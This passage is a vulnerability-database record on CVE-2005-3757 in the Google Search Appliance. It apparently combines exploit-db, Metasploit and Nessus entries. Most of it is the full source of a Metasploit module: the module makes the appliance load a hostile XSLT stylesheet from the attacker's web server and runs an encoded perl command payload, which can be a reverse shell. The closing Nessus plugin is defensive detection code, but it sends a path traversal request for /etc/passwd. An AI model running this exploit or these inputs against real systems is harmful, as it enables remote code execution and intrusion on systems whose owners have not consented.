rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'output' => 'xml_no_dtd',\r\n\t\t\t\t'q' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'\r\n\t\t\t}\r\n\t\t}, 10)\r\n\r\n\t\tif (res and res.body =~ /cannot be resolved to an ip address/)\r\n\t\t\tprint_status(\"This system appears to be vulnerable\")\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tif (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)\r\n\t\t\tprint_status(\"This system appears to be patched\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"This system is not exploitable\")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\t# load the xml data\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"google_proxystylesheet.xml\")\r\n\t\tfd = File.open(path, \"rb\")\r\n\t\t@xml_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tprint_status(\"Obtaining the appliance site and client IDs...\")\r\n\t\t# Send a HTTP/1.0 request to learn the site configuration\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'version' => '1.0'\r\n\t\t}, 10)\r\n\r\n\t\tif !(res and res['location'] and res['location'] =~ /site=/)\r\n\t\t\tprint_status(\"Could not read the location header: #{res.code} #{res.message}\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tm = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im)\r\n\t\tif !(m and m[1] and m[2])\r\n\t\t\tprint_status(\"Invalid location header: #{res['location']}\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\")\r\n\t\tstart_service\r\n\r\n\t\tprint_status(\"Requesting a search using our custom XSLT...\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/search',\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'client' => m[2],\r\n\t\t\t\t'site' => m[1],\r\n\t\t\t\t'output' => 'xml_no_dtd',\r\n\t\t\t\t'q' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\",\r\n\t\t\t\t'proxyreload' => '1'\r\n\t\t\t}\r\n\t\t}, 25)\r\n\r\n\t\tif (res)\r\n\t\t\tprint_status(\"The server returned: #{res.code} #{res.message}\")\r\n\t\t\tprint_status(\"Waiting on the payload to execute...\")\r\n\t\t\tselect(nil,nil,nil,20)\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"Shutting down the web service...\")\r\n\t\tstop_service\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16907/"}], "metasploit": [{"lastseen": "2020-06-23T22:22:35", "description": "This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work.\n", "published": "2007-03-12T01:08:18", "type": "metasploit", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/GOOGLE_PROXYSTYLESHEET_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\n 'Description' => %q{\n This module exploits a feature in the Saxon XSLT parser used by\n the Google Search Appliance. This feature allows for arbitrary\n java methods to be called. Google released a patch and advisory to\n their client base in August of 2005 (GA-2005-08-m). The target appliance\n must be able to connect back to your machine for this exploit to work.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-3757'],\n ['OSVDB', '20981'],\n ['BID', '15509'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 4000,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Aug 16 2005',\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultTarget' => 0))\n end\n\n # Handle incoming requests from the appliance\n def on_request_uri(cli, request)\n\n print_status(\"Handling new incoming HTTP request...\")\n\n exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))'\n data = @xml_data.gsub(/:x:MSF:x:/, exec_str)\n send_response(cli, data)\n end\n\n def autofilter\n true\n end\n\n def check\n res = send_request_cgi({\n 'uri' => '/search',\n 'vars_get' =>\n {\n 'client' => rand_text_alpha(rand(15)+1),\n 'site' => rand_text_alpha(rand(15)+1),\n 'output' => 'xml_no_dtd',\n 'q' => rand_text_alpha(rand(15)+1),\n 'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'\n }\n }, 10)\n\n if (res and res.body =~ /cannot be resolved to an ip address/)\n vprint_status(\"This system appears to be vulnerable\")\n return Exploit::CheckCode::Appears\n end\n\n if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)\n vprint_status(\"This system appears to be patched\")\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # load the xml data\n path = File.join(Msf::Config.data_directory, \"exploits\", \"google_proxystylesheet.xml\")\n fd = File.open(path, \"rb\")\n @xml_data = fd.read(fd.stat.size)\n fd.close\n\n print_status(\"Obtaining the appliance site and client IDs...\")\n # Send a HTTP/1.0 request to learn the site configuration\n res = send_request_raw({\n 'uri' => '/',\n 'version' => '1.0'\n }, 10)\n\n if !(res and res['location'] and res['location'] =~ /site=/)\n print_status(\"Could not read the location header: #{res.code} #{res.message}\")\n return\n end\n\n m = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im)\n if !(m and m[1] and m[2])\n print_status(\"Invalid location header: #{res['location']}\")\n return\n end\n\n print_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\")\n start_service\n\n print_status(\"Requesting a search using our custom XSLT...\")\n res = send_request_cgi({\n 'uri' => '/search',\n 'vars_get' =>\n {\n 'client' => m[2],\n 'site' => m[1],\n 'output' => 'xml_no_dtd',\n 'q' => rand_text_alpha(rand(15)+1),\n 'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\",\n 'proxyreload' => '1'\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print_status(\"Waiting on the payload to execute...\")\n select(nil,nil,nil,20)\n else\n print_status(\"No response from the server\")\n end\n\n print_status(\"Shutting down the web service...\")\n stop_service\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/google_proxystylesheet_exec.rb"}], "nessus": [{"lastseen": "2021-01-20T11:31:42", "description": "The remote Google Search Appliance / Mini Search Appliance fails to\nsanitize user-supplied input to the 'proxystylesheet' parameter, which\nis used for customization of the search interface. Exploitation of this\nissue may lead to arbitrary code execution (as an unprivileged user),\nport scanning, file discovery, and cross-site scripting.", "edition": 27, "published": "2005-11-22T00:00:00", "title": "Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3757", "CVE-2005-3758", "CVE-2005-3756", "CVE-2005-3754", "CVE-2005-3755"], "modified": "2005-11-22T00:00:00", "cpe": ["cpe:/h:google:mini_search_appliance", "cpe:/h:google:search_appliance"], "id": "GOOGLE_SEARCH_APPLIANCE_PROXYSTYLESHEET.NASL", "href": "https://www.tenable.com/plugins/nessus/20241", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20241);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2005-3754\", \n \"CVE-2005-3755\", \n \"CVE-2005-3756\", \n \"CVE-2005-3757\", \n \"CVE-2005-3758\"\n );\n script_bugtraq_id(15509);\n\n script_name(english:\"Google Search Appliance proxystylesheet Parameter Multiple Remote Vulnerabilities (XSS, Code Exec, ID)\");\n script_summary(english:\"Checks for proxystylesheet parameter multiple vulnerabilities in Google Search Appliance\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Google Search Appliance / Mini Search Appliance fails to\nsanitize user-supplied input to the 'proxystylesheet' parameter, which\nis used for customization of the search interface. Exploitation of this\nissue may lead to arbitrary code execution (as an unprivileged user),\nport scanning, file discovery, and cross-site scripting.\");\n # http://web.archive.org/web/20051213084327/http://metasploit.com/research/vulns/google_proxystylesheet/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?516540e6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Nov/652\");\n script_set_attribute(attribute:\"solution\", value:\"Contact Google for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Appliance ProxyStyleSheet Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/h:google:search_appliance\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/h:google:mini_search_appliance\");\n script_end_attributes();\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"google_search_appliance_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_kb_item(string(\"www/\", port, \"/google_search_appliance\"))) exit(0);\n\n\nfile = \"../../../../../../../../../../etc/passwd\";\nw = http_send_recv3(method:\"GET\",\n item:string(\n \"/search?\",\n \"site=nessus&\",\n \"output=xml_no_dtd&\",\n \"q=\", SCRIPT_NAME, \"&\",\n \"proxystylesheet=\", file\n ), \n port:port\n);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\n# There's a problem if the error message indicates...\nif (\n # the file doesn't exist or...\n string(\"ERROR: Unable to fetch the stylesheet from source: \", file) >< res ||\n # the file does exist but isn't a valid stylesheet.\n \"The following required pattern was not found:\" >< res\n) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}